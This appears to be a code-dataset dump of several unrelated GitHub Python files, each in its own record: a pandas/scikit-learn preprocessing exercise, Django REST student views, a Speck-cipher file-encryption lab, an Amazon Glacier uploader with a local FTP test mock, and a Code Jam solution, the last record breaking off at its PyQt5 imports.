"os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pyltp.Segmentor", "line_number": 36, "usage_type": "call"}, {"api_name": "pyltp.Postagger", "line_number": 41, "usage_type": "call"}, {"api_name": "pyltp.NamedEntityRecognizer", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 59, "usage_type": "call"}, {"api_name": "os.system", "line_number": 60, "usage_type": "call"}, {"api_name": "utils.remove_duplicate_elements", "line_number": 141, "usage_type": "call"}, {"api_name": "utils.remove_duplicate_elements", "line_number": 142, "usage_type": "call"}, {"api_name": "utils.remove_duplicate_elements", "line_number": 143, "usage_type": "call"}, {"api_name": "utils.remove_duplicate_elements", "line_number": 144, "usage_type": "call"}, {"api_name": "utils.remove_duplicate_elements", "line_number": 145, "usage_type": "call"}, {"api_name": "utils.remove_duplicate_elements", "line_number": 146, "usage_type": "call"}, {"api_name": "utils.extract_seg", "line_number": 164, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 168, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 172, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 173, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 174, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 175, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 176, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 177, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 178, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 181, "usage_type": "call"}, {"api_name": "utils.find_element", 
"line_number": 182, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 183, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 184, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 185, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 186, "usage_type": "call"}, {"api_name": "utils.sentence_result", "line_number": 205, "usage_type": "call"}, {"api_name": "utils.extract_seg", "line_number": 257, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 267, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 272, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 275, "usage_type": "call"}]} +{"seq_id": "9128365884", "text": "import pandas as pd\nfrom io import StringIO\n\ndata = '''\na,b,c,d\n1,2,3,4\n5,6,,8\n9,10,11,12\n'''\n\ndf = pd.read_csv(StringIO(data))\ndf\n\n# null count 확인\ndf.isnull().sum()\n\n# 데이터\ndf1 = df\ndf1.dropna(axis=0)\ndf1.dropna(axis=1)\n\ndata2 = '''\na,b,c,d\n1,2,3,\n5,6,,\n,,,\n'''\ndf2 = pd.read_csv(StringIO(data2))\ndf2\ndf2.dropna(how='all')\ndf2.dropna(axis=1, how='all')\n\ndf1\ndf1.dropna(thresh=4)\n\ndf1\ndf1.dropna(subset=['c'])\n\n\nfrom sklearn.impute import SimpleImputer\n\nimr = SimpleImputer(strategy='mean')\nimr = imr.fit(df.values)\nimputed_data = imr.transform(df.values)\nimputed_data\n\nimport pandas as pd\ndata = pd.DataFrame([\n [1, 'B', 'S', 13],\n [2, 'R', 'D', 9],\n [3, 'R', 'H', 9],\n [4, 'B', 'C', 3],\n [5, 'B', 'S', 12]\n])\n\ndata.columns=[\"no\", \"color\", \"shape\", \"number\"]\ndata\n\nshape_order = {\n 'S' : 1,\n 'D' : 2,\n 'C' : 3,\n 'H' : 4\n}\ndata['shape'] = data['shape'].map(shape_order)\ndata\n\ninv_shape_order = {v: k for k, v in shape_order.items()}\ndata['shape'].map(inv_shape_order)\n\nimport numpy as np\nclass_mapping = {label : idx for idx, label in enumerate(np.unique(data[\"shape\"]))}\nclass_mapping\n\ndata[\"shape\"] = data[\"shape\"].map(class_mapping)\ndata\n\ninv_class_mapping = {v : k for k, v in class_mapping.items()}\ndata[\"shape\"] = data[\"shape\"].map(inv_class_mapping)\ndata\n\nfrom sklearn.preprocessing import LabelEncoder\n\nlabeler = LabelEncoder()\ny = labeler.fit_transform(data[\"shape\"].values)\ny\n\nlabeler.inverse_transform(y)\n\ny_color = labeler.fit_transform(data[\"color\"].values)\ny_color\n\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\n\nencoder = OneHotEncoder(handle_unknown='ignore')\nencoder.fit(data[[\"shape\"]].values)\nencoder.categories_\ndf_dummy = pd.DataFrame(encoder.transform(data[[\"shape\"]].values).toarray(), columns=[\"is_C\", \"is_D\", \"is_H\", \"is_S\"])\n\ndata_prep = pd.concat([data, df_dummy], axis=1)\ndata_prep\n\npd.get_dummies(data[\"shape\"])\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_wine\n\ndf_wine = pd.DataFrame(load_wine().data, columns=load_wine().feature_names)\ndf_wine_label = pd.DataFrame(load_wine().target, columns=[\"class\"])\ndf_wine = pd.concat([df_wine, df_wine_label], axis=1)\nprint(load_wine().DESCR)\nprint('레이블: ', np.unique(df_wine[\"class\"]))\n\ndf_x, df_y = df_wine.iloc[:, 0:12].values, df_wine.iloc[:, 13].values\nnp.unique(df_y)\nx_train, x_test, y_train, y_test = train_test_split(df_x, df_y, test_size=0.3, random_state=0, stratify=df_y)\n\nprint(x_train)\nprint(x_test)\nprint(y_train)\nprint(y_test)\n\nfrom sklearn.preprocessing import MinMaxScaler\n\nmms = MinMaxScaler()\nx_train_norm = 
mms.fit_transform(x_train)\nx_test_norm = mms.fit_transform(x_test)\n\n\n\n", "repo_name": "slykid/Python3", "sub_path": "Field Test Code/preprocessing1.py", "file_name": "preprocessing1.py", "file_ext": "py", "file_size_in_byte": 2715, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 28, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 72, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 96, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 104, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 111, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_wine", "line_number": 111, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 112, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_wine", "line_number": 112, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 113, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_wine", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 118, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 119, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "42813293838", "text": "from rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nfrom api.models import Student\n# Create your views here.\n\nfrom .serializears import StudentSerializer\n\n@api_view(['GET'])\ndef index(request):\n students = Student.objects.all()\n serialstudents = StudentSerializer(students, many=True)\n return Response({\n 'status':200,\n 'students':serialstudents.data\n })\n\n@api_view(['GET'])\ndef studentView(request, pk):\n try :\n student = Student.objects.get(id=pk)\n serialstudent = StudentSerializer(student, many=False)\n return Response({\n 'status':200,\n 'students':serialstudent.data,\n })\n except :\n return Response({'status':400})\n\n\n@api_view(['POST'])\ndef studentAdd(request):\n try:\n \n serialdata = StudentSerializer(data=request.data)\n if serialdata.is_valid():\n serialdata.save()\n \n return Response({\n 'status':200,\n 'student':serialdata.data,\n 'message':'Student added successfully'\n })\n\n except:\n return Response({'status':400})\n\n@api_view(['POST'])\ndef studentUpdate(request, pk):\n try :\n student = Student.objects.get(id=pk)\n serialstudent = StudentSerializer(instance=student, data=request.data)\n\n if serialstudent.is_valid():\n serialstudent.save()\n \n return Response({\n 'status':200,\n 'student':serialstudent.data,\n 'message':'Updated successfully'\n })\n\n except :\n return 
Response({'status':400})\n\n\n@api_view(['DELETE'])\ndef studentdelete(request, pk):\n try:\n\n student = Student.objects.get(id=pk)\n student.delete()\n \n students = Student.objects.all()\n serialstudents = StudentSerializer(students, many=True)\n \n return Response({\n 'status':200,\n 'student':serialstudents.data,\n 'message':'Student Deleted successfully'\n })\n\n except:\n return Response({'status':400})", "repo_name": "nirjana/student-", "sub_path": "api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2100, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "api.models.Student.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "api.models.Student.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "api.models.Student", "line_number": 11, "usage_type": "name"}, {"api_name": "serializears.StudentSerializer", "line_number": 12, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 13, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 9, "usage_type": "call"}, {"api_name": "api.models.Student.objects.get", "line_number": 21, "usage_type": "call"}, {"api_name": "api.models.Student.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "api.models.Student", "line_number": 21, "usage_type": "name"}, {"api_name": "serializears.StudentSerializer", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 23, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 28, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 18, "usage_type": "call"}, {"api_name": "serializears.StudentSerializer", "line_number": 35, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 39, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 46, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 31, "usage_type": "call"}, {"api_name": "api.models.Student.objects.get", "line_number": 51, "usage_type": "call"}, {"api_name": "api.models.Student.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "api.models.Student", "line_number": 51, "usage_type": "name"}, {"api_name": "serializears.StudentSerializer", "line_number": 52, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 57, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 64, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 48, "usage_type": "call"}, {"api_name": "api.models.Student.objects.get", "line_number": 71, "usage_type": "call"}, {"api_name": "api.models.Student.objects", "line_number": 71, "usage_type": "attribute"}, {"api_name": "api.models.Student", "line_number": 71, "usage_type": "name"}, {"api_name": "api.models.Student.objects.all", "line_number": 74, "usage_type": "call"}, {"api_name": "api.models.Student.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "api.models.Student", "line_number": 74, "usage_type": "name"}, {"api_name": "serializears.StudentSerializer", "line_number": 75, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 77, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 
84, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "40919159928", "text": "import os # необходим для доступа к файловой системе\nimport secrets # необходим для генерации рандомных чисел\nfrom sys import argv\nimport time\nimport os.path\n\n\nclass SpeckCipher:\n BLOCK_SIZE = 64\n KEY_SIZE = 128\n ROUNDS = 27\n WORD_SIZE_N = 32\n KEY_WORDS_M = 4\n\n def encryptFile(self, fileName, key):\n cipherText = [0, 0]\n plainText = [0, 0]\n # получаем round ключ из ключа\n roundKey = self.keySchedule(self.bytesToWord32(key))\n # создаём и сохраняем IV (вектор инициализации)\n intVect = [0, 0]\n intVect[0] = self.IV()\n intVect[1] = self.IV()\n dataBytes = self.word32ToBytes(intVect)\n # открываем файл для зашифрованного текста\n fileOutput = open(fileName + '.enc', \"wb\")\n # записывам в него IV\n fileOutput.write(bytearray(dataBytes))\n # oткрываем файл исходного текста\n fileSize = os.path.getsize(fileName)\n fileInput = open(fileName, \"rb\")\n blockSize = 8\n padding = -1\n # читаем блоки по 8 бит\n for i in range(0, fileSize, blockSize):\n block = fileInput.read(blockSize)\n endIndex = i + blockSize\n endIndex = fileSize if endIndex > fileSize else endIndex\n # проверяем необходимы ли заполняющие биты\n if len(block) < blockSize:\n padding = blockSize - (endIndex % blockSize)\n if padding != blockSize:\n blck = self.padding(block, blockSize, pad=padding)\n block = [ord(x) for x in blck]\n # зашифровываем блок и записываем его в файл\n block_list = list(block)\n plainText = self.bytesToWord32(block_list)\n cipherText = self.encrypt(plainText, roundKey, intVect)\n encBlock = self.word32ToBytes(cipherText)\n fileOutput.write(bytearray(encBlock))\n # если длина дополнения = 8, то добавляем ещё один блок\n if padding == blockSize:\n block = [8] * blockSize\n plainText = self.bytesToWord32(block)\n cipherText = self.encrypt(plainText, roundKey, intVect)\n encBlock = self.word32ToBytes(cipherText)\n fileOutput.write(bytearray(encBlock))\n # закрываем файлы\n fileOutput.flush()\n fileOutput.close()\n fileInput.close()\n\n def decryptFile(self, fileName, key):\n cipherText = [0, 0]\n plainText = [0, 0]\n # получаем round ключ из ключа\n roundKey = self.keySchedule(self.bytesToWord32(key))\n # открываем файл для дешифрованного текста\n fileOutput = open(fileName + '.dec', \"wb\")\n # открываем файл с зашифрованным текстом\n fileSize = os.path.getsize(fileName + '.enc')\n fileInput = open(fileName + '.enc', \"rb\")\n blockSize = 8\n # создаём и сохраняем IV (вектор инициализации)\n intVect = [0, 0]\n for i in range(0, fileSize, blockSize):\n endIndex = i + blockSize\n endIndex = fileSize if endIndex > fileSize else endIndex\n block = list(fileInput.read(blockSize))\n if i == 0:\n # первый блок содержит вектор инициализации\n intVect = self.bytesToWord32(block)\n else:\n # остальные блоки содержат зашифрованный текст\n cipherText = self.bytesToWord32(block)\n plainText = self.decrypt(cipherText, roundKey, intVect)\n decBlock = self.word32ToBytes(plainText)\n # ...за исключением последнего, который дополнен значениями до длины блока\n if endIndex == fileSize:\n # получаем длину отступа\n a = decBlock[7]\n # удаляем дополнительные биты\n while a > 0:\n decBlock.pop()\n a -= 1\n # записываем в файл\n fileOutput.write(bytearray(decBlock))\n #закрываем файлы\n fileOutput.flush()\n fileOutput.close()\n fileInput.close()\n\n # 32-разрядная функция поворота влево\n def Rol(self, x, r):\n tmp = (x >> (self.WORD_SIZE_N - r)) & 
0x00000000ffffffff\n return ((x << r) | tmp) & 0x00000000ffffffff\n\n # 32-разрядная функция поворота вправо\n def Ror(self, x, r):\n tmp = (x << (self.WORD_SIZE_N - r)) & 0x00000000ffffffff\n return ((x >> r) | tmp) & 0x00000000ffffffff\n\n # вектор инициализации: возвращаем 32 битное число\n def IV(self):\n return secrets.randbits(32)\n\n # преобразует блоки по 4 байта в 32-битные слова, используя little-endian порядок:\n # первый байт в самые правые 8 бит и так далее до самых левых 8 бит\n def bytesToWord32(self, inBytes):\n lenght = len(inBytes)\n outWords = [0] * (lenght // 4)\n j = 0\n for i in range(0, lenght, 4):\n outWords[j] = inBytes[i] | (inBytes[i + 1] << 8) | (inBytes[i + 2] << 16) | (inBytes[i + 3] << 24)\n j += 1\n return outWords\n\n # преобразует 32-битное слово в 4 байта, используя порядок little-endian:\n def word32ToBytes(self, inWords):\n lenght = len(inWords)\n outBytes = [0] * (lenght * 4)\n j = 0\n for i in range(0, lenght):\n outBytes[j] = inWords[i] & 0xff\n outBytes[j + 1] = (inWords[i] >> 8) & 0xff\n outBytes[j + 2] = (inWords[i] >> 16) & 0xff\n outBytes[j + 3] = (inWords[i] >> 24) & 0xff\n j += 4\n return outBytes\n\n # планировщик ключей: получает ключ и подготавливает буфер round ключей\n def keySchedule(self, key):\n subKey = [0] * self.ROUNDS\n key = key\n A, B, C, D = key[0], key[1], key[2], key[3]\n\n for i in range(0, self.ROUNDS, 3):\n subKey[i] = A\n B = self.Ror(B, 8)\n B = (B + A) & 0x00000000ffffffff\n B ^= i\n A = self.Rol(A, 3)\n A ^= B\n\n subKey[i + 1] = A\n C = self.Ror(C, 8)\n C = (C + A) & 0x00000000ffffffff\n C ^= (i + 1)\n A = self.Rol(A, 3)\n A ^= C\n\n subKey[i + 2] = A\n D = self.Ror(D, 8)\n D = (D + A) & 0x00000000ffffffff\n D ^= (i + 2)\n A = self.Rol(A, 3)\n A ^= D\n return subKey\n\n # зашифрует блок, используя round ключ и IV, и вернет зашифрованный блок\n def encrypt(self, plainText, roundKey, intVect):\n cipherText = plainText # [0, 0]\n plainText = plainText\n for i in range(0, self.ROUNDS):\n intVect[1] = self.Ror(intVect[1], 8)\n intVect[1] = (intVect[1] + intVect[0]) & 0x00000000ffffffff\n intVect[1] ^= roundKey[i]\n intVect[0] = self.Rol(intVect[0], 3)\n intVect[0] ^= intVect[1]\n cipherText[0] = plainText[0] ^ intVect[0]\n cipherText[1] = plainText[1] ^ intVect[1]\n return cipherText\n\n # расшифрует блок, используя round ключ и IV, и вернет расшифрованный блок\n def decrypt(self, cipherText, roundKey, intVect):\n plainText = cipherText # [0, 0]\n cipherText = cipherText\n for i in range(0, self.ROUNDS):\n intVect[1] = self.Ror(intVect[1], 8)\n intVect[1] = (intVect[1] + intVect[0]) & 0x00000000ffffffff\n intVect[1] ^= roundKey[i]\n intVect[0] = self.Rol(intVect[0], 3)\n intVect[0] ^= intVect[1]\n plainText[0] = cipherText[0] ^ intVect[0]\n plainText[1] = cipherText[1] ^ intVect[1]\n return plainText\n\n # заполнение строки дополнительными значениями до заданной длины\n def padding(self, txt, lng, pad=0, truncate=False):\n text = str(txt)\n # если это массив байтов, удаляем ненужные символы\n if text.find(\"b'\") != -1:\n text = text[2:-1]\n pad = pad\n # требуется ли усечение?\n if truncate:\n if len(text) % lng == 0:\n # длина равна запрашиваемой: возвращает заданную строку\n return text\n else:\n # Возвращает выровненную строку\n return text.ljust(len(text) + lng - (len(text) % lng))\n # проверяем, заполнена ли строка\n if len(text) == lng:\n # возвращаем строку\n return text\n elif len(text) > lng:\n return text[:lng]\n else:\n # Возвращает выровненную строку\n return text.ljust(len(text) + lng - (len(text) % lng), 
chr(pad))\n\n\nFILENAME = \"sample.txt\"\n\n# создание экземпляра класса\nspeck = SpeckCipher()\n\n\n\ndef main(arguments):\n # запрашиваем ключ\n tmpKey = input('Enter key (16 chars, no spaces): ')\n tmpKey.replace(' ', '')\n if tmpKey == '':\n return\n # дополняем ключ до 16 байт\n key = speck.padding(tmpKey, 16, truncate=True)\n keyLst = list(key)\n keyList = [ord(x) for x in keyLst]\n\n # запрашиваем файл для зашифрования\n tmpFile = input('File to be encrypted (return = sample file): ')\n if tmpFile == '':\n # если файл не задан, то берём дефолтный\n tmpFile = FILENAME\n if not os.path.isfile(tmpFile):\n # если файл не создан, создаём\n f = open(tmpFile, \"w\")\n f.write(\"Sample text\")\n f.flush()\n f.close()\n print('Sample file not found - created')\n # проверяем если заданный файл существует\n if not os.path.exists(tmpFile):\n print('{} doesn\\'t exist.'.format(tmpFile))\n return\n # проверяем за заданный файл валидный\n if not os.path.isfile(tmpFile):\n print('{} isn\\'t a valide file.'.format(tmpFile))\n return\n\n print(f'Encrypting {tmpFile}...')\n time1 = time.time()\n speck.encryptFile(tmpFile, keyList)\n time2 = time.time()\n print('File encrypted. Time elapsed: {}'.format(time2 - time1))\n\n print('Now decrypting...')\n time1 = time.time()\n speck.decryptFile(tmpFile, keyList)\n time2 = time.time()\n print('File decrypted. Time elapsed: {}'.format(time2 - time1))\n\n\nif __name__ == \"__main__\":\n main(argv)\n", "repo_name": "Elizaveta-Kazakova/IS", "sub_path": "lab2/SpeckCipher.py", "file_name": "SpeckCipher.py", "file_ext": "py", "file_size_in_byte": 11625, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.getsize", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "secrets.randbits", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 247, "usage_type": "call"}, {"api_name": "os.path", "line_number": 247, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 255, "usage_type": "call"}, {"api_name": "os.path", "line_number": 255, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 259, "usage_type": "call"}, {"api_name": "os.path", "line_number": 259, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 264, "usage_type": "call"}, {"api_name": "time.time", "line_number": 266, "usage_type": "call"}, {"api_name": "time.time", "line_number": 270, "usage_type": "call"}, {"api_name": "time.time", "line_number": 272, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 277, "usage_type": "argument"}]} +{"seq_id": "25215612301", "text": "import uuid\nimport multiprocessing\nimport logging as logging_\nimport random\nimport os\nimport time\nfrom ftplib import FTP\n\nlogger = logging_.getLogger(__name__)\n\n\nclass GlacierData():\n\n def __init__(self):\n self.archive_id = None\n\n\nclass Glacier():\n \"\"\"Service to interact with Amazon Glacier\"\"\"\n\n def __init__(self, ctx):\n self.ctx = ctx\n self.layer2 = None\n\n def upload_file(self, directory, filename):\n \"\"\"Uploads a file to glacier. 
Returns an instance of GlacierData\"\"\"\n logger.debug(\"Uploading file '%s/%s'\", directory, filename)\n if self.ctx.dry_run:\n return\n from boto.glacier.layer2 import Layer2\n self.layer2 = Layer2(\n self.ctx.config.get(\"identity\", \"aws_access_key_id\"),\n self.ctx.config.get(\"identity\", \"aws_secret_access_key\")\n )\n\n vault = self.layer2.get_vault(self.ctx.config.get(\"defaults\", \"vault_name\"))\n archive_id = vault.create_archive_from_file(os.path.join(directory, filename),\n description=os.path.join(directory, filename))\n\n glacier_data = GlacierData()\n glacier_data.archive_id = archive_id\n return glacier_data\n\n def close(self):\n if self.layer2:\n try:\n self.layer2.close()\n except:\n logger.exception(\"Exception detected when trying to close(), \"\n \"will log and ignore it...\")\n finally:\n self.layer2 = None\n\n\n#===============================================================================\n# Mocks and other implementations to easy tests\n#===============================================================================\n\nclass GlacierMock():\n\n def __init__(self, ctx):\n self.ctx = ctx\n\n def upload_file(self, directory, filename):\n logger.debug(\"Uploading file '%s/%s'\", directory, filename)\n glacier_data = GlacierData()\n glacier_data.archive_id = str(uuid.uuid4())\n return glacier_data\n\n def close(self):\n pass\n\n\nclass GlacierErrorOnUploadMock(GlacierMock):\n\n def upload_file(self, directory, filename):\n raise(Exception(\"This implementation of upload_file() ALWAYS raises an exception\"))\n\n\nclass GlacierFtpBased():\n\n def __init__(self, ctx):\n self.ctx = ctx\n self.ftp_user = 'random_{0}'.format(random.randint(1000000, 9999999))\n self.ftp_password = str(uuid.uuid4())\n self.ftp_port = 18263\n self.upload_file_ftp_callback = None\n\n def _launch(self):\n logger.info(\"Launching FTP server in child process\")\n from pyftpdlib.authorizers import DummyAuthorizer\n from pyftpdlib.handlers import FTPHandler\n from pyftpdlib.servers import FTPServer\n authorizer = DummyAuthorizer()\n authorizer.add_user(self.ftp_user, self.ftp_password, \"/tmp\", perm=\"w\")\n handler = FTPHandler\n handler.authorizer = authorizer\n server = FTPServer((\"127.0.0.1\", self.ftp_port), handler)\n server.serve_forever()\n\n def kill_ftp(self):\n logger.info(\"Terminanting child...\")\n self.child.terminate()\n logger.info(\"Joining child...\")\n self.child.join()\n logger.info(\"Done!\")\n\n def launch(self):\n self.child = multiprocessing.Process(target=self._launch)\n self.child.start()\n\n def wait_for_ftpserver(self):\n ftp = FTP()\n for try_num in range(1, 11):\n try:\n ftp.connect('127.0.0.1', self.ftp_port)\n logger.info(\"Connect OK after %s tries\", try_num)\n return\n except:\n time.sleep(0.1)\n ftp.connect('127.0.0.1', self.ftp_port)\n\n def upload_file(self, directory, filename):\n logger.info(\"Connecting to FTP...\")\n ftp = FTP()\n ftp.connect('127.0.0.1', self.ftp_port)\n logger.info(\"Logging in to FTP...\")\n ftp.login(self.ftp_user, self.ftp_password)\n generated_uuid = str(uuid.uuid4())\n remote_filename = \"{0}-{1}\".format(filename, generated_uuid)\n with open(os.path.join(directory, filename)) as fp:\n logger.info(\"Sending file to FTP server...\")\n ftp.storbinary(\"STOR {0}\".format(remote_filename), fp, 128,\n self.upload_file_ftp_callback)\n logger.info(\"File sent OK to FTP\")\n\n glacier_data = GlacierData()\n glacier_data.archive_id = generated_uuid\n return glacier_data\n\n def close(self):\n pass\n", "repo_name": "hgdeoro/frockup", 
"sub_path": "frockup/glacier.py", "file_name": "glacier.py", "file_ext": "py", "file_size_in_byte": 4523, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "boto.glacier.layer2.Layer2", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 67, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 84, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 85, "usage_type": "call"}, {"api_name": "pyftpdlib.authorizers.DummyAuthorizer", "line_number": 94, "usage_type": "call"}, {"api_name": "pyftpdlib.handlers.FTPHandler", "line_number": 96, "usage_type": "name"}, {"api_name": "pyftpdlib.servers.FTPServer", "line_number": 98, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 109, "usage_type": "call"}, {"api_name": "ftplib.FTP", "line_number": 113, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 120, "usage_type": "call"}, {"api_name": "ftplib.FTP", "line_number": 125, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}]} +{"seq_id": "23576875181", "text": "import math\nimport itertools\n\ndef solve(recipe, ingredients):\n limits = transform(recipe, ingredients)\n count = 0\n if len(recipe) == 1:\n return len(limits[0])\n if len(recipe) != 2:\n return None\n for pairing in itertools.permutations(range(len(ingredients[0]))):\n potential_count = 0\n for i, pair in enumerate(pairing):\n if i >= len(limits[0]) or pair >= len(limits[1]):\n continue\n (min_1, max_1) = limits[0][i]\n (min_2, max_2) = limits[1][pair]\n if min_1 > max_2 or min_2 > max_1:\n continue\n potential_count += 1\n if potential_count > count:\n count = potential_count\n return count\n\ndef faster_solve(recipe, ingredients):\n limits = transform(recipe, ingredients)\n pointers = [0 for i in range(len(limits))]\n\n count = 0\n while True:\n if pointers[0] >= len(limits[0]):\n return count\n (lower, upper) = limits[0][pointers[0]]\n success = True\n max_limiter = 0\n for i in range(1, len(limits)):\n if pointers[i] >= len(limits[i]):\n return count\n (new_lower, new_upper) = limits[i][pointers[i]]\n while new_upper < lower and pointers[i] < len(limits[i]) - 1:\n pointers[i] += 1\n new_lower, new_upper = limits[i][pointers[i]]\n if pointers[i] >= len(limits[i]) or new_upper < lower:\n return count\n if new_lower > upper:\n pointers[max_limiter] += 1\n success = False\n break\n lower = max(lower, new_lower)\n if new_upper < upper:\n upper = new_upper\n max_limiter = i\n if success:\n count += 1\n for i in range(len(limits)):\n pointers[i] += 1\n\n return count\n\n\ndef transform(recipe, ingredients):\n limits = []\n for i, ingredient in enumerate(ingredients):\n ingredient_limits = []\n for package in ingredient:\n factor = float(package) / recipe[i]\n lower_bound = int(math.ceil(factor / 1.1))\n upper_bound = int(math.floor(factor / 0.9))\n if lower_bound > upper_bound:\n continue\n else:\n 
ingredient_limits.append((lower_bound, upper_bound))\n limits.append(sorted(ingredient_limits))\n return limits\n\n\n\n\ndef parse():\n N, P = [int(i) for i in raw_input().split()]\n recipe = [int(i) for i in raw_input().split()]\n ingredients = []\n for r in range(N):\n row = [int(c) for c in raw_input().split()]\n ingredients.append(row)\n return recipe, ingredients\n\nT = int(raw_input())\nfor t in range(1, T+1):\n recipe, ingredients = parse()\n print(\"Case #{0}: {1}\".format(t, faster_solve(recipe, ingredients)))", "repo_name": "dr-dos-ok/Code_Jam_Webscraper", "sub_path": "solutions_python/Problem_204/125.py", "file_name": "125.py", "file_ext": "py", "file_size_in_byte": 2879, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "itertools.permutations", "line_number": 11, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 67, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "3711461774", "text": "from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets 